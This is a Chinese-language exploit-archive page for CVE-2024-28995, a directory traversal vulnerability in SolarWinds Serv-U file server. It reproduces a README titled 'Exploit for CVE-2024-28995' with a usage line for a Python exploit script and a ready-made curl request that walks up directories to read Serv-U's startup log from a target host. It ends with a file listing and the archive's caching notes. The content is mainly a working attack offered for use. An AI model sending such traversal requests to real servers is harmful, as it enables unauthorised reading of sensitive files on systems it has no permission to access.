POC详情: bc8304aad10cee51e5efa0f8346d6390e640d6b3

来源
关联漏洞
标题: SolarWinds Serv-U 路径遍历漏洞 (CVE-2024-28995)
描述:SolarWinds Serv-U File Server是美国SolarWinds公司的一款文件传输服务器。 SolarWinds Serv-U存在路径遍历漏洞,该漏洞源于容易受到目录横向的影响,允许访问读取主机上的敏感文件。
描述
Exploit for CVE-2024-28995
介绍
## Exploit For CVE-2024-28995

On June 5, 2024, SolarWinds published an advisory for CVE-2024-28995, a high-severity directory traversal vulnerability affecting their file transfer solution Serv-U. The vulnerability was discovered by researcher Hussein Daher of Web Immunify.

### Using exploit
```
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
```

### Using Curl
```
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
```

Refrence:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995
文件快照

[4.0K] /data/pocs/bc8304aad10cee51e5efa0f8346d6390e640d6b3 ├── [ 679] CVE-2024-28995.py └── [ 656] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。